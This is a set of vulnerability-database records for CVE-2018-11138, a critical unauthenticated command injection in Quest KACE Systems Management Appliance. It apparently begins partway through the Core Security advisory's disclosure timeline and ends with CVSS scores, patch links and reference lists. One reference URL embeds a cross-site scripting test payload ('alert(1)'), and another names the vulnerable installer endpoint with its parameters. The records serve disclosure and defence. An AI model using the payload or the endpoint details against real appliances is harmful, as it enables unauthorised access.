\n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "db": "PACKETSTORM",
        "id": "148005"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44950",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-11138",
        "trust": 3.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "44950",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148005",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "PACKETSTORM",
        "id": "148005"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "id": "VAR-201805-0598",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      }
    ],
    "trust": 1.1800866
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:01:57.517000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "KACE Systems Management Appliance",
        "trust": 0.8,
        "url": "https://www.quest.com/products/kace-systems-management-appliance/"
      },
      {
        "title": "Patch for QuestKACESystemManagementAppliance Command Injection Vulnerability (CNVD-2018-10907)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/131203"
      },
      {
        "title": "Quest KACE System Management Appliance Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81228"
      },
      {
        "title": "lean0x2f.github.io",
        "trust": 0.1,
        "url": "https://github.com/lean0x2f/lean0x2f.github.io "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-77",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
      },
      {
        "trust": 1.8,
        "url": "https://www.exploit-db.com/exploits/44950/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11138"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/exploit/unix/http/quest_kace_systems_management_rce"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
      },
      {
        "trust": 0.1,
        "url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
      },
      {
        "trust": 0.1,
        "url": "http://[serverip]/systemui/settings_network.php"
      },
      {
        "trust": 0.1,
        "url": "https://support.quest.com/essentials/reporting-security-vulnerability."
      },
      {
        "trust": 0.1,
        "url": "http://[serverip]/adminui/advisory.php?id=10"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
      },
      {
        "trust": 0.1,
        "url": "https://www.quest.com/products/kace-systems-management-appliance/"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
      },
      {
        "trust": 0.1,
        "url": "https://support.quest.com/download-install-detail/6086148."
      },
      {
        "trust": 0.1,
        "url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
      },
      {
        "trust": 0.1,
        "url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
      },
      {
        "trust": 0.1,
        "url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "PACKETSTORM",
        "id": "148005"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "PACKETSTORM",
        "id": "148005"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "date": "2018-05-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "date": "2018-07-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "date": "2018-05-31T20:52:06",
        "db": "PACKETSTORM",
        "id": "148005"
      },
      {
        "date": "2018-05-31T18:29:00.557000",
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "date": "2018-06-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "date": "2018-07-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "date": "2019-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Quest KACE Systems Management Appliance Command injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ],
    "trust": 0.6
  }
}

{
  "affected": [],
  "aliases": [
    "CVE-2018-11138"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-05-31T18:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system.",
  "id": "GHSA-8m62-73pq-x847",
  "modified": "2022-05-13T01:49:01Z",
  "published": "2022-05-13T01:49:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11138"
    },
    {
      "type": "WEB",
      "url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/44950"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

{
  "GSD": {
    "alias": "CVE-2018-11138",
    "description": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system.",
    "id": "GSD-2018-11138",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-11138"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-11138"
      ],
      "details": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system.",
      "id": "GSD-2018-11138",
      "modified": "2023-12-13T01:22:42.368444Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cisa.gov": {
      "cveID": "CVE-2018-11138",
      "dateAdded": "2022-03-25",
      "dueDate": "2022-04-15",
      "product": "KACE System Management Appliance",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance is accessible by anonymous users and can be abused to perform remote code execution.",
      "vendorProject": "Quest",
      "vulnerabilityName": "Quest KACE System Management Appliance Remote Command Execution Vulnerability"
    },
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2018-11138",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "44950",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/44950/"
          },
          {
            "name": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities",
            "refsource": "MISC",
            "url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-11138"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-78"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Technical Description",
                "Third Party Advisory"
              ],
              "url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
            },
            {
              "name": "44950",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/44950/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-03T00:03Z",
      "publishedDate": "2018-05-31T18:29Z"
    }
  }
}